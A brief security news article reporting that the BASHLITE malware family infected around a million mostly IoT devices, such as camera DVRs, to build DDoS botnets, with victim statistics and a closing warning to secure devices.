Security researchers have uncovered a massive security breach of around one million IoT (Internet of Things) and other network connected devices around the world. The attack was carried out by a family of malware known as BASHLITE.
BASHLITE Has Been Unleashed Against a Million Devices
Experts from the Level 3 Threat Research Labs have uncovered a small malware family known as BASHLITE that is behind a huge botnet attack that infiltrated about a million devices. The threat is also known as Lizkebab, Torlus, and Gafgyt.
The malware is tied to a very organized structure of botnets that act against various types of appliances connected to the Internet. BASHLITE is responsible for controlling a lot of malicious C&C servers that serve commands to an increasing number of botnets.
The security experts propose that hacking groups such as Lizard Squad and Poodle Corp are behind the malware. Their attacks are mainly against IoT devices. Upon infection, they are used for conducting and leasing distributed denial of service attacks.
Upon successful infiltration, the malware executes the wget command to retrieve the DDOS bot payload. Multiple versions are downloaded to the system and executed to uncover which one works for the target architecture.
The known statistics indicate that 96% of the infected devices are in fact IoT (Internet of Things) appliances, 4% are home routers, and less than 1% are Linux servers.
The majority of victims are located in Brazil, Taiwan, and Colombia. A major target is security camera DVRs as their default security settings are easy to compromise. They use simple administrative credentials and provide remote access options.
All affected device run the Linux operating system which it makes for the attackers to compile cross platform versions of the malware.
The massive BASHLITE is yet another warning to IoT creators and users. Make sure that your appliance is secure before allowing it Internet access.